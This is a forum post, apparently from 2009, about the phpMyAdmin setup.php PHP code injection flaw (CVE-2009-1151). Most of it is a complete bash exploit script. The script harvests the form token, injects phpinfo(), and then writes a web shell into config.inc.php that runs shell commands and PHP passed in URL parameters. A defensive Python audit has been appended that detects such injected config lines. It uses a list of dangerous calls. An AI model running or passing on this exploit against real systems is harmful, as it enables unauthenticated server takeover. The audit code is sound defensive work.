Meihe Learning Online (main site) eimhe.com
phpMyAdmin setup.php script PHP code injection vulnerability

Posted 2009-6-22 23:23:36
I first saw this on a foreign 0day site. It has now been made public, and the vendor has already released a patch, so the damage will not be that great anymore; I am posting it here.

System IDs:
CVE: CVE-2009-1151
BugTraq: 34234

Affected versions:
phpMyAdmin 2.11.x/3.x

Vulnerability analysis:
phpMyAdmin's setup script is used to generate the configuration. If a remote attacker submits a specially crafted POST request to this script, arbitrary PHP code can be written into the generated config.inc.php configuration file. Because that configuration file is saved on the server, an unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP code.

Exploit script (Linux):
#!/bin/bash

if [[ $# -ne 1 ]]
then
        echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
        echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
        exit
fi

if ! which curl >/dev/null
then
        echo "sorry but you need curl for this script to work!"
        echo "on Debian/Ubuntu: sudo apt-get install curl"
        exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

        flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

        echo "[+] attempting to inject phpinfo() ..."
        curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

        if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
        then
                curl -ks --url "$3/config/config.inc.php" >$flag
                echo "[+] success! phpinfo() injected successfully! output saved on $flag"
                curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
                echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
                echo "    $3/config/config.inc.php?c=ls+-l+/"
                echo "    $3/config/config.inc.php?p=phpinfo();"
                echo "    please send any feedback/improvements for this script to"\
                "unknown.pentester<AT_sign__here>gmail.com"
        else
                echo "[+] no luck injecting to $3/config/config.inc.php :("
                exit
        fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
        length=`echo -n $token | wc -c`

        # valid form token obtained?
        if [[ $length -eq 32 ]]
        then
                echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
                # attempt exploit!
                exploit $token $cookiejar $1
        else
                echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
                exit
        fi
else
        echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
        exit
fi


Those interested can test it in a virtual machine.
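Added example, not from the post or from phpMyAdmin itself: a defender-side audit of a generated config.inc.php for the trace this injection leaves behind. The setup script writes the submitted key name into the file unescaped, so a crafted key such as host']=''; phpinfo();// turns one $cfg assignment into several PHP statements; the check flags any $cfg line that is no longer a single plain assignment or that carries a dangerous call. The sample config text is constructed, and the exact layout phpMyAdmin's setup script emits is an assumption.

```python
import re

# Constructed sample in the shape phpMyAdmin's setup script writes (layout assumed).
CLEAN_CONFIG = """<?php
/* Servers configuration */
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
?>
"""

# The same file after an unescaped key "host']=''; phpinfo();//" has been written out.
INJECTED_CONFIG = CLEAN_CONFIG.replace(
    "$cfg['Servers'][$i]['host'] = 'localhost';",
    "$cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';")

# A well-formed setting: a $cfg[...] chain of simple keys, one value, one statement, nothing after.
SETTING_RE = re.compile(
    r"^\$cfg(?:\[(?:\$i|\d+|'[A-Za-z0-9_]+')\])+\s*=\s*"
    r"(?:'[^';]*'|\"[^\";]*\"|true|false|\d+|\$[A-Za-z0-9_]+)\s*;$")

# Tokens that never belong in a generated config value.
SUSPICIOUS_TOKENS = ("phpinfo(", "system(", "exec(", "passthru(", "shell_exec(",
                     "eval(", "$_GET", "$_POST", "$_REQUEST")


def audit_config(text):
    """Return (line_number, line) for every $cfg line that is not a plain
    assignment or that contains a suspicious token; other lines are ignored."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped.startswith("$cfg"):
            continue
        if not SETTING_RE.match(stripped) or any(t in stripped for t in SUSPICIOUS_TOKENS):
            findings.append((number, stripped))
    return findings


if __name__ == "__main__":
    for number, line in audit_config(INJECTED_CONFIG):
        print("suspicious config line %d: %s" % (number, line))
```

Run it against the real config/config.inc.php of a phpMyAdmin install; a clean file produces no findings, and any finding on the host line is the signature of this bug.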
Posted 2009-6-23 11:24:25
Posted 2009-6-23 13:28:45
Posted 2009-6-23 19:33:51